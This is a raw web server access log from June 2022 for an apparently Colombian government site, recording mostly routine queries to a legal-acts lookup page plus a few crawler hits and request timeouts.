172.22.2.4 - - [02/Jun/2022:07:12:50 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
216.245.221.92 - - [02/Jun/2022:07:13:24 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Jun/2022:07:13:44 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=1749&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
181.61.209.157 - - [02/Jun/2022:07:13:46 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2019%2F HTTP/1.1" 200 240477
172.22.2.4 - - [02/Jun/2022:07:13:52 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=1760&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [02/Jun/2022:07:13:56 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=1832&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [02/Jun/2022:07:14:00 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=1846&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [02/Jun/2022:07:14:06 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=1873&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [02/Jun/2022:07:14:10 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=1874&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [02/Jun/2022:07:14:14 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=1891&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [02/Jun/2022:07:14:19 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=1911&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [02/Jun/2022:07:14:27 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=1913&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [02/Jun/2022:07:14:29 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=1914&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [02/Jun/2022:07:14:31 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=1915&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [02/Jun/2022:07:14:35 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=2007&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [02/Jun/2022:07:14:38 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=2021&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [02/Jun/2022:07:14:39 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=2021&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
173.252.107.120 - - [02/Jun/2022:07:14:42 -0500] "GET /lee-antes-de-compartir-secretaria-de-ambiente-y-establecimientos-de-comercio-nocturno-se-comprometen-a-una-rumba-con-menos-ruido.html HTTP/1.1" 206 1189
172.22.2.4 - - [02/Jun/2022:07:14:44 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=2022&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [02/Jun/2022:07:14:47 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=2062&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [02/Jun/2022:07:14:49 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=2083&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [02/Jun/2022:07:14:57 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=2106&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [02/Jun/2022:07:15:00 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=2114&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [02/Jun/2022:07:15:02 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=2122&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [02/Jun/2022:07:15:05 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=2129&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [02/Jun/2022:07:15:07 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=2135&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [02/Jun/2022:07:15:10 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=2152&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [02/Jun/2022:07:15:14 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=2163&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [02/Jun/2022:07:15:19 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=2167&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [02/Jun/2022:07:15:19 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=2167&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [02/Jun/2022:07:15:26 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=2170&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [02/Jun/2022:07:15:30 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=2179&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [02/Jun/2022:07:15:35 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=2180&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [02/Jun/2022:07:15:39 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=2182&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [02/Jun/2022:07:15:44 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=2184&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [02/Jun/2022:07:15:48 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=2188&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [02/Jun/2022:07:14:10 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Jun/2022:07:15:52 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=2194&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [02/Jun/2022:07:15:53 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=2194&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [02/Jun/2022:07:15:57 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=2196&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [02/Jun/2022:07:16:03 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=2199&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [02/Jun/2022:07:16:08 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=2200&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
46.101.1.185 - - [02/Jun/2022:07:16:10 -0500] "-" 408 -
172.22.2.4 - - [02/Jun/2022:07:16:12 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=2207&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [02/Jun/2022:07:16:15 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=2212&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
46.101.1.185 - - [02/Jun/2022:07:16:16 -0500] "-" 408 -
46.101.1.185 - - [02/Jun/2022:07:16:16 -0500] "-" 408 -
181.61.209.157 - - [02/Jun/2022:07:16:15 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2019%2F HTTP/1.1" 200 240477
46.101.1.185 - - [02/Jun/2022:07:16:17 -0500] "-" 408 -
172.22.2.4 - - [02/Jun/2022:07:16:18 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=2235&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [02/Jun/2022:07:16:19 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=2235&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
46.101.1.185 - - [02/Jun/2022:07:16:22 -0500] "-" 408 -
46.101.1.185 - - [02/Jun/2022:07:16:23 -0500] "-" 408 -
172.22.2.4 - - [02/Jun/2022:07:16:23 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=2236&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
46.101.1.185 - - [02/Jun/2022:07:16:24 -0500] "-" 408 -
172.22.2.4 - - [02/Jun/2022:07:16:24 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=2236&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [02/Jun/2022:07:16:25 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=2236&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
46.101.1.185 - - [02/Jun/2022:07:16:29 -0500] "-" 408 -
46.101.1.185 - - [02/Jun/2022:07:16:30 -0500] "-" 408 -
172.22.2.4 - - [02/Jun/2022:07:16:32 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=2258&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
46.101.1.185 - - [02/Jun/2022:07:16:35 -0500] "-" 408 -
